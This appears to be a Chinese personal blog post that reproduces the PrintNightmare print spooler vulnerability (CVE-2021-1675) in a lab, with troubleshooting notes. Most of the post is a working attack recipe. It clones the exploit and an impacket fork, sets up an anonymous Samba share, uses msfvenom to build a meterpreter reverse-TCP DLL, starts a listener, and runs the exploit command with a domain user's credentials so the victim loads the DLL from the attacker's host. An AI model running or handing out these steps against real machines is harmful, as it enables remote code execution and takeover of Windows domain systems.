cve-2021-1675复现


环境

受害机:window2019(192.168.153.133)
攻击机:kali(192.168.153.134)

利用前提

或许需要:SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限
一定需要:一个普通的域用户
一定需要:开启Spooler服务

环境搭建

安装impacket

git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

配置smb服务
vim /etc/samba/smb.conf

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes

sudo service smbd start

生成dll和启动msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.134 LPORT=4444 -f dll -o /tmp/rever.dll
msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
run




下载exp

cd ~/
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675

利用漏洞

sudo python3 CVE-2021-1675.py djhons.com/test:[email protected]@192.168.153.133 '\\192.168.153.134\smb\rever.dll'






支持的系统

目前仅在server2019上成功。2008和2012均未成功。

遇到的坑

第一个坑:
按照exp里面的smb配置文件配置smb后无法匿名登录,需要提供账号和密码,后删除最后一行后可正常匿名访问。在本次实验时通过资源管理器直接访问smb服务器提示组策略出问题但是这个问题可以忽略(我也不知道为什么可以忽略),还有一个奇怪的是在公司同样的配置物理机可以直接访问smb,在家的电脑上却也需要密码而只有win7能正常访问。反正按照我上面讲的就能利用成功。




第二个坑:
这是另一个cpp的exp。大概执行过程是受害机会将dll下载到C:\Windows\System32\spool\drivers\x64\3这个目录下然后执行。首先这个cpp需要改4个地方,第一个是112行需要改成C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_[受害机特有的]\Amd64、剩下是将三个含有old的路径改为C:\\Windows\\System32\\spool\\drivers\\x64\\%s。问题来了,第一个问题是不知道112行那个受害机特有的路径是啥,第二个问题明明dll是上传到C:\Windows\System32\spool\drivers\x64\3这个目录但是exp却是执行的C:\Windows\System32\spool\drivers\x64这个目录下的dll而这个目录下根本就没有dll。我也尝试把三个含有old路径修改为C:\\Windows\\System32\\spool\\drivers\\x64\\3\\%s结果还是不行。

第三个坑:
因为这个洞和域没关系,我没有域环境也不想搭就偷懒以win7为靶机,结果一直Connection Failed,这个折腾了我很久。我猜测可能和SeImpersonatePrivilege或SeAssignPrimaryTokenPrivilege权限有关系,因为我这个win7虚拟机没有这个两个权限,以前利用potato提权也失败了。

第四个坑:
在域控上面尝试过利用域管和本地管理员账号来利用这个漏洞,结果都不行只有普通域用户才能利用成功。如果是普通pc就没有账号的限制,但是在普通pc上利用这个漏洞的意义不大。

第五个坑:利用成功之后sploor这个服务会自动关闭,也就是说这个漏洞只能利用成功一次。

莫名其妙

在windows2012上复现没有成功,一直报x05的错误,这个2012是具有SeImpersonatePrivilege权限的。

声明:john'blog|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - cve-2021-1675复现


欢迎来到脚本小子的博客